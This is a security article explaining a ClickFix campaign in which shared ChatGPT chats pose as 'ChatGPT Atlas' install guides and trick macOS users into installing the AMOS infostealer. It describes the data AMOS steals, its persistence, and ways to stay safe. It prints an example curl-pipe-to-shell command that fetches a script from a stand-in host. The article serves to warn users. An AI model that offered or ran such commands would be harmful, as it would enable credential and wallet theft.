"Cybercriminals are abusing ChatGPT’s chat-sharing feature to distribute fake “ChatGPT Atlas” install guides that deliver the deadly AMOS macOS infostealer through social engineering."
How Are Fake ChatGPT Atlas Guides Being Used for Attacks?
Security researchers have uncovered a clever new malware campaign targeting macOS users by abusing ChatGPT’s built-in chat-sharing feature. Attackers create highly polished conversations using ChatGPT that claim to be official step-by-step installation guides for a fake browser called ChatGPT Atlas. These shared chats are published on the trusted chatgpt.com/share domain, making them look completely legitimate at first glance.
The attackers then buy Google Ads for search terms such as “chatgpt atlas” or “atlas browser mac”. When users click the ads, they land directly on those shared ChatGPT pages. Because the URL belongs to OpenAI’s domain and the content reads professionally, victims often assume the guide is safe and official.
What Is the ClickFix Technique?
The attack uses a growing social-engineering method called ClickFix. Instead of exploiting security vulnerabilities, scammers simply convince users to run malicious commands themselves.
On the fake guide page, users are instructed to copy and paste a one-line shell command into macOS Terminal to either “install Atlas” or “fix a browser issue.” The command quietly downloads and runs a script from a malicious domain such as atlas-extension[.]com, which immediately begins the infection process.
# Example of how these attacks convince users curl -fsSL malicious-domain.example/install.sh | sh
Once executed, the attacker-controlled server gains control of what runs on the victim’s computer.
What Exactly Does AMOS Malware Do?
The downloaded malware is AMOS (Atomic macOS Stealer), a commercial-grade infostealer widely used by cybercriminals. After execution, the malware repeatedly asks users for their macOS administrator password using fake system prompts until it receives valid sudo credentials.
With elevated privileges, AMOS steals a wide range of sensitive data, including:
- Saved browser passwords, cookies, and autofill data from Chrome, Firefox, and Chromium-based browsers
- Cryptocurrency wallet data from apps like Electrum, Coinomi, and Exodus
- Wallet browser extensions
- Documents such as TXT, PDF, and DOCX files from Desktop, Documents, and Downloads folders
- Session data from Telegram Desktop and OpenVPN
Is There a Backdoor After the Theft?
Yes—and this is what makes the attack especially dangerous. Beyond stealing data once, the malware installs a persistent backdoor using macOS startup mechanisms like LaunchAgents or LaunchDaemons. This ensures the attacker regains access every time the computer boots.
Because the backdoor runs with the same privileges obtained through the stolen sudo password, attackers can:
- Steal more files at any time
- Deploy new malware payloads
- Use infected computers for further attacks
Security warning: Even if the original malware is removed, system access may remain compromised. Passwords, tokens, and keys should be considered exposed and rotated.
Why the “ChatGPT Atlas” Name Works So Well
The campaign succeeds because ChatGPT Atlas is a real AI browser name launched by OpenAI in October 2025. Victims searching for more information about it naturally trust results tied to ChatGPT branding.
However, there is no legitimate standalone installer distributed through third-party sites. Any ad or shared guide pointing to random download sources is almost certainly malicious.
| Legitimate Behavior | Malicious Red Flags |
|---|---|
| Official links from OpenAI websites or apps | Ads leading to chatgpt.com/share pages |
| No password needed for browser installs | Requests for sudo password |
| No Terminal commands required | One-line Terminal copy/paste commands |
How Can macOS Users Stay Safe?
Basic cyber hygiene goes a long way in preventing these types of attacks:
- Never run Terminal commands copied from ads, social posts, or shared chats.
- Verify domains carefully. OpenAI does not distribute software from unknown third-party websites.
- Be suspicious of any installer asking for your macOS administrator password.
- Use reputable security software and keep macOS fully updated.
- If unsure about a command, ask an expert or paste it into an analysis tool before running.
FAQs
Is ChatGPT Atlas itself malware?
No. ChatGPT Atlas is a legitimate product, but criminals are abusing its name to trick users into running fake installers.
Are shared ChatGPT links unsafe by default?
Not usually, but attackers can host harmful instructions inside legitimate shared chats. Always treat technical instructions from unknown sources with caution.
What should I do if I already ran one of these commands?
Disconnect from the internet, run professional malware scans, change all passwords, revoke active sessions, and consider reinstalling macOS to ensure complete cleanup.
